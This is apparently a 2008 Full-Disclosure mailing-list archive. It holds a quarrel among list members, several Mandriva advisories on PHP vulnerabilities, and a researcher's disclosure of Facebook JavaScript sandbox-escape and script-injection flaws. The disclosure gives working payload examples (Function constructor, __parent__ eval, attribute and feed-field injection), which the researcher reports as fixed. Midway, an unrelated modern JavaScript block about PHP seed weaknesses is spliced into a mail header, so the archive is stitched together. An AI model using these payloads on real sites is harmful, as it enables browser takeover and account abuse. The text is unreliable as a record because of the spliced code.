References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com>
Message-ID: <486D4020.50104@buanzo.com.ar>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

n3td3v wrote:
| Keep this thread bookmarked just in case, we don't actually know who
| Ureleet is, it could be an Al-Qaeda splinter cell working

For all we know, Ureleet could be you.

- --
Arturo "Buanzo" Busleiman
Independent Security Consultant - SANS - OISSG
http://www.buanzo.com.ar/pro/eng.html
Mailing List Archives at http://archiver.mailfighter.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIbUAgAlpOsGhXcE0RClItAJ4ndrkAqFt+szk33UU47U4zmzJeLACfYHHr
t1DO0pkyd18vyilU9E5ePuo=
=kwuM
-----END PGP SIGNATURE-----

From xploitable at gmail.com Thu Jul 3 22:26:51 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Jul 2008 22:26:51 +0100
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <486D4020.50104@buanzo.com.ar>
References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> <486D4020.50104@buanzo.com.ar>
Message-ID: <4b6ee9310807031426g2effacfm50cec9558b12cabf@mail.gmail.com>

On Thu, Jul 3, 2008 at 10:09 PM, Arturo 'Buanzo' Busleiman wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> n3td3v wrote:
> | Keep this thread bookmarked just in case, we don't actually know who
> | Ureleet is, it could be an Al-Qaeda splinter cell working
>
> For all we know, Ureleet could be you.
>

Now that's paranoia! Full background checks were done on me by the Home Office when I went on the Ethical Hacking course at Abertay Dundee.

Remember viva end of n3td3v group and the Robert Lemos news article after that? That's when I fucked off to the course, that was advertised in the media to be monitored by the Home Office of the British Government.

If I was a terrorist I'd have been arrested by now!!! Unless they're keeping me sweet to see if my web behaviour escalates.

But yeah, I've been on the radar for years, If I was a cyber crook or terrorist I wouldn't be able to send this message to you just now because I would be incarcerated.

Think about it for a second...

In fact, I think I said at one point I was applying for a position at MI5, so do I really seem like Ureleet to you?

All the best,

n3td3v

> - --
> Arturo "Buanzo" Busleiman
> Independent Security Consultant - SANS - OISSG
> http://www.buanzo.com.ar/pro/eng.html
> Mailing List Archives at http://archiver.mailfighter.net
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iD8DBQFIbUAgAlpOsGhXcE0RClItAJ4ndrkAqFt+szk33UU47U4zmzJeLACfYHHr
> t1DO0pkyd18vyilU9E5ePuo=
> =kwuM
> -----END PGP SIGNATURE-----
>

From buanzo at buanzo.com.ar Thu Jul 3 23:06:47 2008
From: buanzo at buanzo.com.ar (Arturo 'Buanzo' Busleiman)
Date: Thu, 03 Jul 2008 19:06:47 -0300
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <4b6ee9310807031426g2effacfm50cec9558b12cabf@mail.gmail.com>
References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> <486D4020.50104@buanzo.com.ar> <4b6ee9310807031426g2effacfm50cec9558b12cabf@mail.gmail.com>
Message-ID: <486D4D77.4090902@buanzo.com.ar>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

n3td3v wrote:
| In fact, I think I said at one point I was applying for a position at
| MI5, so do I really seem like Ureleet to you?

Sorry, you're not THAT important. Well, maybe you are, but that's EXACTLY the point.

Cya.

- --
Arturo "Buanzo" Busleiman
Independent Security Consultant - SANS - OISSG
http://www.buanzo.com.ar/pro/eng.html
Mailing List Archives at http://archiver.mailfighter.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIbU13AlpOsGhXcE0RCs63AJsFCjaTMpe/z+xRFfMJFoB6f+Q7tQCeM2c8
U3xNlqNx0cju9rU0/H+1X54=
=QzFp
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Jul 4 00:59:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 03 Jul 2008 17:59:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:127 ] - Updated PHP packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory MDVSA-2008:127
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : php
 Date : July 3, 2008
 Affected: 2008.0
 _______________________________________________________________________

 Problem Description:

 A number of vulnerabilities have been found and corrected in PHP:

 The htmlentities() and htmlspecialchars() functions in PHP prior to 5.2.5 accepted partial multibyte sequences, which has unknown impact and attack vectors (CVE-2007-5898).

 The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites local forms in which the ACTION attribute references a non-local URL, which could allow a remote attacker to obtain potentially sensitive information by reading the requests for this URL (CVE-2007-5899).

 php-cgi in PHP prior to 5.2.6 does not properly calculate the length of PATH_TRANSLATED, which has unknown impact and attack vectors (CVE-2008-0599).

 The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown impact and context-dependent attack vectors related to incomplete multibyte characters (CVE-2008-2051).

 Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generate a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108).

 The IMAP module in PHP uses obsolete API calls that allow context-dependent attackers to cause a denial of service (crash) via a long IMAP request (CVE-2008-2829).

 In addition, this update also corrects an issue with some float to string conversions.

 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2829
 http://qa.mandriva.com/show_bug.cgi?id=37171
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:

 Mandriva Linux 2008.0/X86_64:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID Date User ID
 pub 1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbT1tmqjQ0CJFipgRArQFAKCcqymdDdwSuu+57idL7jxJ9IPiEQCeN8oP
oaOP1b+JJp5AsiD6UfECzaY=
=7pe0
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Jul 4 01:05:00 2008
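The GENERATE_SEED weakness named in MDVSA-2008:127 above (and repeated in MDVSA-2008:128) can be reproduced with plain integer and floating-point arithmetic. The following is an added example, not code from PHP or from Mandriva: it models a seed computed as `(long)(time * pid * 1000000 * lcg)`, shows when the 32-bit result is forced to zero and how many low bits a 64-bit result loses, and sets an OS-entropy seed beside it. The form of the seed expression, the function names and the sample values are assumptions made for illustration.

```javascript
// Added example: model of a time/pid-derived PRNG seed and its failure modes.
// ASSUMPTION: seed = (long)(time * pid * 1000000 * lcg), lcg in (0, 1).
const crypto = require('crypto');

// Trailing zero bits of a positive 32-bit integer.
function trailingZeroBits(n) {
  let count = 0;
  while (n !== 0 && (n & 1) === 0) { n >>>= 1; count++; }
  return count;
}

// 32-bit long: the integer product wraps modulo 2^32 before it is scaled by
// the fractional lcg value and truncated.
function seed32(time, pid, lcg) {
  const wrapped = Math.imul(Math.imul(time, pid), 1000000);
  return Math.trunc(wrapped * lcg) | 0;
}

// 1000000 = 2^6 * 15625 already contributes six factors of two. If time and
// pid (both positive) contribute the other 26, the wrapped product is 0 and
// so is the seed, whatever lcg is.
function forcesZeroSeed32(time, pid) {
  return trailingZeroBits(time) + trailingZeroBits(pid) + 6 >= 32;
}

// 64-bit long: the product fits, but the multiplication by lcg happens in a
// double with a 53-bit mantissa, so the low bits of a large seed are rounded
// away before the cast back to an integer.
function seed64(time, pid, lcg) {
  const exact = BigInt.asIntN(64, BigInt(time) * BigInt(pid) * 1000000n);
  const scaled = Number(exact) * lcg;
  return BigInt.asIntN(64, BigInt(Math.trunc(scaled)));
}

// Trailing zero bits of a 64-bit value held in a BigInt.
function trailingZeroBitsBig(v) {
  if (v === 0n) return 64;
  let count = 0;
  while ((v & 1n) === 0n) { v >>= 1n; count++; }
  return count;
}

// Hardened alternative for comparison (not the patch shipped in the updated
// packages): take the seed from the operating system's CSPRNG.
function seedFromOsEntropy() {
  return crypto.randomBytes(4).readUInt32LE(0);
}

// Constructed sample values.
const SAMPLE_ZERO_CASE = { time: 0x48000000, pid: 1234 };   // time = 9 * 2^27
const SAMPLE_TYPICAL = { time: 1215043200, pid: 4321 };     // 3 Jul 2008 00:00 UTC
```

A check like `forcesZeroSeed32` is also usable as a unit test against any seed routine that multiplies clock and process values in fixed-width integers.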
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 03 Jul 2008 18:05:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:128 ] - Updated PHP packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:128
http://www.mandriva.com/security/
_______________________________________________________________________

Package : php
Date    : July 3, 2008
Affected: 2008.1
_______________________________________________________________________

Problem Description:

A number of vulnerabilities have been found and corrected in PHP:

php-cgi in PHP prior to 5.2.6 does not properly calculate the length
of PATH_TRANSLATED, which has unknown impact and attack vectors
(CVE-2008-0599).

The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown
impact and context-dependent attack vectors related to incomplete
multibyte characters (CVE-2008-2051).

Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5
were discovered that could produce a zero seed in rare circumstances
on 32bit systems and generate a portion of zero bits during conversion
due to insufficient precision on 64bit systems (CVE-2008-2107,
CVE-2008-2108).

The IMAP module in PHP uses obsolete API calls that allow
context-dependent attackers to cause a denial of service (crash)
via a long IMAP request (CVE-2008-2829).

In addition, the updated packages provide a number of bug fixes.

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2829
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2008.1
Mandriva Linux 2008.1/X86_64
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbT7gmqjQ0CJFipgRAqVOAKC/PGY3i2IKO592B0Ukfck2HnZPogCfUijv
tvsSl4XAuy3Fg1iJ05MfgMs=
=M3vw
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Jul 4 00:51:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 03 Jul 2008 17:51:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:125 ] - Updated PHP packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:125
http://www.mandriva.com/security/
_______________________________________________________________________

Package : php
Date    : July 3, 2008
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

A number of vulnerabilities have been found and corrected in PHP:

A vulnerability in the chunk_split() function in PHP prior to 5.2.4
has unknown impact and attack vectors, related to an incorrect size
calculation (CVE-2007-4660).

The htmlentities() and htmlspecialchars() functions in PHP prior to
5.2.5 accepted partial multibyte sequences, which has unknown impact
and attack vectors (CVE-2007-5898).

The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites
local forms in which the ACTION attribute references a non-local URL,
which could allow a remote attacker to obtain potentially sensitive
information by reading the requests for this URL (CVE-2007-5899).

The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown
impact and context-dependent attack vectors related to incomplete
multibyte characters (CVE-2008-2051).

Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5
were discovered that could produce a zero seed in rare circumstances
on 32bit systems and generate a portion of zero bits during conversion
due to insufficient precision on 64bit systems (CVE-2008-2107,
CVE-2008-2108).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4660
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108
_______________________________________________________________________

Updated Packages:

Corporate 4.0
Corporate 4.0/X86_64
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbTtTmqjQ0CJFipgRAnNAAKDwwaKKcTBqPYE40XfKDbRrAvoiOwCgqEAn
Zhoapnb5zx3YIXdkfv2y5eA=
=zV17
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Jul 4 00:55:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 03 Jul 2008 17:55:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:126 ] - Updated PHP packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:126
http://www.mandriva.com/security/
_______________________________________________________________________

Package : php
Date    : July 3, 2008
Affected: 2007.1
_______________________________________________________________________

Problem Description:

A number of vulnerabilities have been found and corrected in PHP:

PHP 5.2.1 would allow context-dependent attackers to read portions
of heap memory by executing certain scripts with a serialized data
input string beginning with 'S:', which did not properly track the
number of input bytes being processed (CVE-2007-1649).

A vulnerability in the chunk_split() function in PHP prior to 5.2.4
has unknown impact and attack vectors, related to an incorrect size
calculation (CVE-2007-4660).

The htmlentities() and htmlspecialchars() functions in PHP prior to
5.2.5 accepted partial multibyte sequences, which has unknown impact
and attack vectors (CVE-2007-5898).

The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites
local forms in which the ACTION attribute references a non-local URL,
which could allow a remote attacker to obtain potentially sensitive
information by reading the requests for this URL (CVE-2007-5899).

The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown
impact and context-dependent attack vectors related to incomplete
multibyte characters (CVE-2008-2051).

Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5
were discovered that could produce a zero seed in rare circumstances
on 32bit systems and generate a portion of zero bits during conversion
due to insufficient precision on 64bit systems (CVE-2008-2107,
CVE-2008-2108).

The IMAP module in PHP uses obsolete API calls that allow
context-dependent attackers to cause a denial of service (crash)
via a long IMAP request (CVE-2008-2829).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1649
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4660
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2829
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.1
Mandriva Linux 2007.1/X86_64
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbTyYmqjQ0CJFipgRAvphAKCgcxPQQyewh1A/Ujgn/aqKsackLwCg3Iwh
02jgWw5BEmn3GOkHEwuKr8U=
=9wP/
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Jul 4 04:16:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 03 Jul 2008 21:16:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:129 ] - Updated PHP packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:129
http://www.mandriva.com/security/
_______________________________________________________________________

Package : php4
Date    : July 3, 2008
Affected: Corporate 3.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5
were discovered that could produce a zero seed in rare circumstances
on 32bit systems and generate a portion of zero bits during conversion
due to insufficient precision on 64bit systems (CVE-2008-2107,
CVE-2008-2108).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108
_______________________________________________________________________

Updated Packages:

Corporate 3.0
Corporate 3.0/X86_64
Multi Network Firewall 2.0
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbWsumqjQ0CJFipgRAsxRAKCe0zLMaz8Akj/J/HCyhYExLp1GXgCeMKrt
qBH74ZN3vFcg99ivslfGoKE=
=rQ++
-----END PGP SIGNATURE-----

From ureleet at gmail.com Fri Jul 4 04:18:48 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 3 Jul 2008 23:18:48 -0400
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <486D4020.50104@buanzo.com.ar>
References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com>
 <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com>
 <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com>
 <024701c8dd4b$e1c8ad50$a55a07f0$@net>
 <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com>
 <486D4020.50104@buanzo.com.ar>
Message-ID: <6158bb410807032018x25cc6de0v733e3dd1a2dec8bb@mail.gmail.com>

you figured me out!

On Thu, Jul 3, 2008 at 5:09 PM, Arturo 'Buanzo' Busleiman wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> n3td3v wrote:
> | Keep this thread bookmarked just in case, we don't actually know who
> | Ureleet is, it could be an Al-Qaeda splinter cell working
>
> For all we know, Ureleet could be you.
>
> - --
> Arturo "Buanzo" Busleiman
> Independent Security Consultant - SANS - OISSG
> http://www.buanzo.com.ar/pro/eng.html
> Mailing List Archives at http://archiver.mailfighter.net
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iD8DBQFIbUAgAlpOsGhXcE0RClItAJ4ndrkAqFt+szk33UU47U4zmzJeLACfYHHr
> t1DO0pkyd18vyilU9E5ePuo=
> =kwuM
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From security at mandriva.com Fri Jul 4 04:20:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 03 Jul 2008 21:20:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:130 ] - Updated PHP packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:130
http://www.mandriva.com/security/
_______________________________________________________________________

Package : php4
Date    : July 3, 2008
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

An integer overflow in the zip_read_entry() function in PHP prior to
4.4.5 allowed remote attackers to execute arbitrary code via a ZIP
archive containing a certain type of entry that triggered a heap
overflow (CVE-2007-1777).

Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5
were discovered that could produce a zero seed in rare circumstances
on 32bit systems and generate a portion of zero bits during conversion
due to insufficient precision on 64bit systems (CVE-2008-2107,
CVE-2008-2108).

The updated packages have been patched to correct these issues.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 _______________________________________________________________________ Updated Packages: Corporate 4.0: 070c4d4f7403e8a88cebf04ec8332d9c corporate/4.0/i586/libphp4_common4-4.4.4-1.8.20060mlcs4.i586.rpm d4a5b569f487d6d0cd9c32e6c57973e2 corporate/4.0/i586/php4-cgi-4.4.4-1.8.20060mlcs4.i586.rpm cc39060ca799894fd2e0e31bdc588d93 corporate/4.0/i586/php4-cli-4.4.4-1.8.20060mlcs4.i586.rpm b9445da53d60e15b815d702bb0639b2c corporate/4.0/i586/php4-devel-4.4.4-1.8.20060mlcs4.i586.rpm 89578a93f8389f1c18a9ec2bb2976c3d corporate/4.0/i586/php4-zip-4.4.4-1.1.20060mlcs4.i586.rpm 1bd1828056a9485094c3f8dcad359868 corporate/4.0/SRPMS/php4-4.4.4-1.8.20060mlcs4.src.rpm 1c44162aa2dd129612450a61427e94f4 corporate/4.0/SRPMS/php4-zip-4.4.4-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: fbc3b649e7429a3dc6e53e367eaf0eb4 corporate/4.0/x86_64/lib64php4_common4-4.4.4-1.8.20060mlcs4.x86_64.rpm 62ec98b2fdf5656e84afa1423f5e757b corporate/4.0/x86_64/php4-cgi-4.4.4-1.8.20060mlcs4.x86_64.rpm 6cfc64f13467e939995d00f5b9293701 corporate/4.0/x86_64/php4-cli-4.4.4-1.8.20060mlcs4.x86_64.rpm a158811bab4ffcc278660fc6bb0b8eb3 corporate/4.0/x86_64/php4-devel-4.4.4-1.8.20060mlcs4.x86_64.rpm e5eec77b3270124b1a68689aa0b3362b corporate/4.0/x86_64/php4-zip-4.4.4-1.1.20060mlcs4.x86_64.rpm 1bd1828056a9485094c3f8dcad359868 corporate/4.0/SRPMS/php4-4.4.4-1.8.20060mlcs4.src.rpm 1c44162aa2dd129612450a61427e94f4 corporate/4.0/SRPMS/php4-zip-4.4.4-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. 
You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbWw0mqjQ0CJFipgRAm3BAKDadkkRtJshMaEt5uWC7vi0OQuEpwCgwWSu
Agn3VI+92DBfD+BQzRSoQhU=
=nH2f
-----END PGP SIGNATURE-----

From jouko at iki.fi Fri Jul 4 10:46:05 2008
From: jouko at iki.fi (Jouko Pynnonen)
Date: Fri, 4 Jul 2008 12:46:05 +0300
Subject: [Full-disclosure] Facebook script injection vulnerabilities
In-Reply-To: <7af564ad0807021601pfd2a87clcc124fbe8b897510@mail.gmail.com>
References: <7af564ad0807021601pfd2a87clcc124fbe8b897510@mail.gmail.com>
Message-ID: <7af564ad0807040246s2ebd7a20r2e84e2dd233f1314@mail.gmail.com>

The two remaining vulnerabilities seem to have been fixed today. Updated information:

7) Escaping JS sandbox with literal String reference
Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a String object can be referenced using a literal expression and the "bracket syntax" to get a Window reference.
Reported: June 21, 2008
Fixed: yes
Example:

"a"["__parent__"].eval("alert('any javascript here');");

8) Escaping JS sandbox with literal RegExp reference
Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a RegExp object can be referenced using a literal expression and the "bracket syntax" to get a Window reference.
Reported: June 21, 2008
Fixed: yes
Example:

/a/["__parent__"].eval("alert('any javascript here');");

On Thu, Jul 3, 2008 at 2:01 AM, Jouko Pynnonen wrote:
> Hello,
>
> This is a summary of various Facebook security issues found and
> reported since June 13, 2008. Two of the vulnerabilities still remain
> on the site, so no details of them are disclosed here. The rest have
> been fixed.
>
> Any of these could be exploited to take over the victim's web browser
> temporarily to e.g. read inbox messages, forcibly install FB
> applications, manipulate friend lists, post messages as the victim
> user, etc. Any of these would also allow creation of a
> self-propagating JavaScript virus/worm.
>
> Most of the issues require the victim user to click on a profile box
> or visit a canvas page of an application in order to trigger the
> injected JavaScript. Issues 2) and 3) don't require mouse clicks.
>
> The vulnerabilities were tested with two browsers: Firefox 3 (Linux +
> Windows) and Internet Explorer 7.
>
> 1) Escaping JS sandbox with literal Function constructor reference
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Description: The JS sandbox denies references to Function.constructor
> but using a literal such as "function f() { }" in the code and
> referring to its constructor with the "bracket syntax" was possible.
> The example below uses this method and calls the constructor with a
> string argument, then calls the resulting Function object.
> Browsers: FF, IE
> Reported: June 13, 2008
> Fixed: yes
> Example:
>
> (function f(){}["constructor"]("alert('any javascript here');"))();
>
> 2) Fb:silverlight JS injection
> Impact: execution of unrestricted JS on canvas pages, profiles
> Description: Simple XSS, described in the previous message to full-disclosure.
> Browsers: FF, IE
> Reported: June 16, 2008
> Fixed: yes
> Example:
>
> width="\" height=",any_javascript_code_here);//" />
>
> 3) Injecting JS in Feeds
> Impact: execution of unrestricted JS when viewing Feeds on profile
> page or the "home" page
> Description: Insufficient input validation in the
> publishTemplatizedAction API method.
> Browsers: FF, IE
> Reported: June 16, 2008
> Fixed: yes
> Example:
>
> # using the perl API
>
> $facebook->feed->publish_templatized_action( title => "My Title",
> title_template => "{actor} is testing feed stories",
> body_template => "hello",
> image_1 => "http://www.mysite.com/image.gif'\"
> onload=(function f(){}['constructor']('alert(1)'))();",
> image_1_link => "http://www.mysite.com" );
>
> 4) Escaping JS sandbox with literal Number reference
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Description: Using the "bracket syntax" to reference the __parent__
> property of a floating point number to get a Window object reference,
> then calling its eval() to run arbitrary code. IE doesn't support the
> property.
> Browsers: FF
> Reported: June 18, 2008
> Fixed: yes
> Example:
>
> 5) Injecting JS in video attachments
> Impact: execution of unrestricted JS when an inbox, wall or forum
> message is viewed (mouseclick required)
> Description: When sharing video content with the
> http://www.facebook.com/sharer.php form, some input fields can be
> modified e.g. with JavaScript. The example below can be typed in the
> address bar to inject JS in a message.
> Browsers: FF, IE
> Reported: June 20, 2008
> Fixed: yes
> Example:
>
> javascript:f=document.forms[0];f['attachment[params][video][src]'].value='#"
> a=b>
>
> 6) Escaping JS sandbox with E4X
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages). Works in browsers supporting
> E4X (Firefox)
> Description: JS parser in browsers supporting E4X understand XML,
> which can contain multi-line strings. Facebook's JS sandbox technology
> didn't expect XML and multi-line strings. The example below
> demonstrates how this could be used to fool the sandbox logic.
> Browsers: FF
> Reported: June 26, 2008
